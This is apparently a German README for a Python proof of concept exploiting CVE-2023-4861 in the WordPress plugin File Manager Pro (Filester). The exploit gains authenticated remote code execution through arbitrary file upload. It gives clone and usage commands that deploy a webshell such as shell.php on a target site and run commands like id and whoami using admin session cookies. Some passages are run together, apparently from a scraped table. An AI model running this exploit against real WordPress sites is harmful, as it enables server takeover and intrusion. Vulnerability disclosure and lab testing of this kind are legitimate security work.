
Automatisierter Proof-of-Concept für authentifizierte Remote-Codeausführung in WordPress File Manager Pro (Filester) über beliebigen Datei-Upload, einschließlich Webshell-Bereitstellung und Befehlsausführung.
Dieses Repository enthält einen Python-Proof-of-Concept für CVE-2023-4861, eine authentifizierte Remote-Code-Ausführung im WordPress-Plugin File Manager Pro - Filester.
CVE-2023-4861File Manager Pro - Filester (filester)< 1.8.11.8.1Admin+ auf Filesterexploit.py automatisiert dasselbe grundlegende Ergebnis, das in der öffentlichen Empfehlung beschrieben wird:
/var/www/html/ zu ermöglichen und .php-Uploads zuzulassen.Wichtiges Implementierungsdetail: Mein PoC geht davon aus, dass das Ziel-Webroot /var/www/html/ ist. Das ist in den Anfragedaten fest codiert und muss möglicherweise für andere Laborumgebungen angepasst werden.
Klonen Sie das Repository und wechseln Sie hinein:
git clone https://github.com/nomaisthere/CVE-2023-4861-PoC.git
cd CVE-2023-4861-PoC
Installieren Sie die Abhängigkeiten:
pip install requests
Hilfe anzeigen:
python3 exploit.py --help
Grundlegendes Beispiel:
python3 exploit.py --url http://target-wordpress --command id \
--cookie 'wordpress_logged_in_xxx=...; wordpress_sec_xxx=...'
Optionaler benutzerdefinierter Shell-Name:
python3 exploit.py --url http://target-wordpress --shell-name shell.php --command whoami \
--cookie 'wordpress_logged_in_xxx=...; wordpress_sec_xxx=...'